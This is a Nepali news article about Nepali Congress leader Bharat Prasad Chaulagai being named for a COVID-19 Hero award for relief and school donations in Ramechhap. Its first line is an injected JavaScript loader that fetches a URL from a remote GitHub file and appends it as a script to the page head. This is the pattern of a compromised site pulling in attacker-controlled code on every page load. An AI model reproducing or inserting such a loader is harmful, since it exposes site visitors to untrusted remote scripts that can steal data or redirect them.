;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
साउन ३१
रामेछाप । नेपाली कांग्रेसका नेता तथा समाजसेवी भरत प्रसाद चौलागाई कोभिड १९ हिरो अवार्डबाट सम्मानित हुने भएका छन् । नेपाली कांग्रेस रामेछापका महाधिबेशन प्रधिनिधि समेत रहेका चौलागाईंलाई कोरोना भाइरस (कोभिड–१९) महामारीको समयमा मानवीय कार्य र समर्थनको क्षेत्रमा अग्रगामी योगदान पुर्याएको भन्दै अमेरीकामा रहेको हामी नेपाली ग्लोवल नामक संस्थाले सम्मान गर्ने भएको छ ।
यहि भाद्र १४ गते अमेरीकामा सम्मान कार्यक्रम आयोजना गरेको भएता पनि कोरोना भाइरसको कारण अन्तराष्ट्रिय उडान नहुने भएकोले कार्यक्रम केहि समय पछि सर्न सक्ने नेपाली कांग्रेसका नेता तथा समाजसेवी भरत प्रसाद चौलागाईले बताए । नेता चौलागाई कोरोनाको समयमा समस्यामा परेका नागरिकको उद्दार गर्नका साथै रामेछापका नागरिकहरुलाई स्वास्थ्य समाग्री वितरण र राहत समाग्री वितरण समेत गरेका थिए ।
यस अघि चौलागाईले शैक्षिक सुधारका लागी विद्यार्थीहरुलाई पोषाक, झोला, कपीकलम वितरण गरेका थिए भने बिद्यालयहरुलाई सीसी क्यामेरा कम्यूटर, डिजिटल हाजिरी मेसीन लगायत वितरण गरेका थिए । file Photo
फेसबुक प्रतिक्रियाहरु